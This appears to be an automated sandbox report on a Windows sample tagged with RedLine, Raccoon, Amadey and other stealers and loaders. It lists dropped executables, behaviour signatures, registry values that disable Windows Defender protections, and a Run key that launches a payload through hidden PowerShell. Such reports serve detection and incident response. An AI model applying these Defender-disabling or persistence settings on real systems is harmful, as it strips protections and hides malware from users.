Malware Analysis Report

2025-08-05 16:12

Sample ID 231026-g3t9gsef4y
Target 6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d
SHA256 6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d
Tags
amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 grome kinza up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d

Threat Level: Known bad

The file 6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d was found to be: Known bad.

Malicious Activity Summary

Glupteba payload

RedLine

Raccoon Stealer payload

DcRat

SmokeLoader

Amadey

Raccoon

ZGRat

Suspicious use of NtCreateUserProcessOtherParentProcess

Glupteba

RedLine payload

Detect ZGRat V1

Modifies Windows Defender Real-time Protection settings

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Reads user/profile data of web browsers

Executes dropped EXE

Checks BIOS information in registry

Windows security modification

Loads dropped DLL

Checks computer location settings

Checks installed software on the system

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Creates scheduled task(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-26 06:20

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-26 06:20

Reported

2023-10-26 06:23

Platform

win10v2004-20231020-en

Max time kernel

122s

Max time network

163s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8A3E.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8A3E.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\8A3E.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\8A3E.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\8A3E.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\EF25.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6pK8ww3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Zm5kJ78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5464.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uy2bJ6yf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ed0Mr9BE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\58CA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\qm8Nc7tt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\vx5hU8bR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dj81PS4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7CCF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8A3E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\924D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Go001xH.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9675.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EF25.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F0BC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F282.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FAEF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSFBEF.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Program Files (x86)\Drive Tools\zDriveTools.exe N/A
N/A N/A C:\Program Files (x86)\Drive Tools\zDriveTools.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3FD9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\8A3E.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\F0BC.exe'\"" C:\Users\Admin\AppData\Local\Temp\F0BC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\5464.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uy2bJ6yf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ed0Mr9BE.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\qm8Nc7tt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\vx5hU8bR.exe N/A

Checks installed software on the system

discovery

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Drive Tools\is-NF51C.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-2JUKL.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-D48GH.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\Drive Tools\zDriveTools.exe C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-2RMV7.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-3ODBG.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-155AO.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-LR12U.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-PMTJ0.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-VU1P4.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-6Q0TS.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-UNODB.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-CM61S.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-23T0I.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-BRBO7.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-B8737.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\Lang\is-64KO5.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files (x86)\Drive Tools\is-V6AHL.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-J04IR.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-BPL08.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\Drive Tools\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-AI8B8.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-2EKR1.tmp C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\9675.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8A3E.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
